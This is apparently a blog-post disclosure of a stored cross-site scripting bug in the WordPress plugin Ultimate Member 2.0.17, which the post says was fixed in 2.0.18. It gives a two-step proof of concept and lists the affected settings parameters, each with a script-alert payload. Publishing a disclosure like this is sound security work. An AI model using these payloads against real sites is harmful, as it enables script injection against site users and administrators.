Exploit Author: Mohammed Ansari(ansaert@gmail.com)
LinkedIn: https://www.linkedin.com/in/ansaert/
Discovered Date: June 8 2018
Affected Version: 2.0.17
Bug has been fixed in 2.0.18 on July 3, 2018.
Active installations: 100,000+
Plugin: https://wordpress.org/plugins/ultimate-member/
LinkedIn: https://www.linkedin.com/in/ansaert/
Discovered Date: June 8 2018
Affected Version: 2.0.17
Bug has been fixed in 2.0.18 on July 3, 2018.
Active installations: 100,000+
Plugin: https://wordpress.org/plugins/ultimate-member/
Description
Ultimate Member is the user profile & membership plugin for WordPress. The plugin makes it a breeze for users to sign-up and become members of your website. The plugin allows you to add beautiful user profiles to your site and is perfect for creating advanced online communities and membership sites. Lightweight and highly extendible, Ultimate Member will enable you to create almost any type of site where users can join and become members with absolute ease.Classification
Type: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')CWE: CWE-79
Proof of Concept
1.Create page title as <script>alert(1);</script>2.Navigate Ultimate Members -> Settings, It ll reflected in General Tab
Affected vectors
All Vectors were affected by XSS. Because without proper validation or escaping while fetching all data from the page title. Example: Showing title in options(Drop down Box) um_options%5Bcore_user%5D=<script>alert(1);</script>- um_options%5Bcore_user%5D → <script>alert(1);</script>
- um_options%5Bcore_login%5D → <script>alert(1);</script>
- um_options%5Bcore_register%5D → <script>alert(1);</script>
- um_options%5Bcore_members%5D → <script>alert(1);</script>
- um_options%5Bcore_logout%5D → <script>alert(1);</script>
- um_options%5Bcore_account%5D → <script>alert(1);</script>
- um_options%5Bcore_password-reset%5D → <script>alert(1);</script>
No comments:
Post a Comment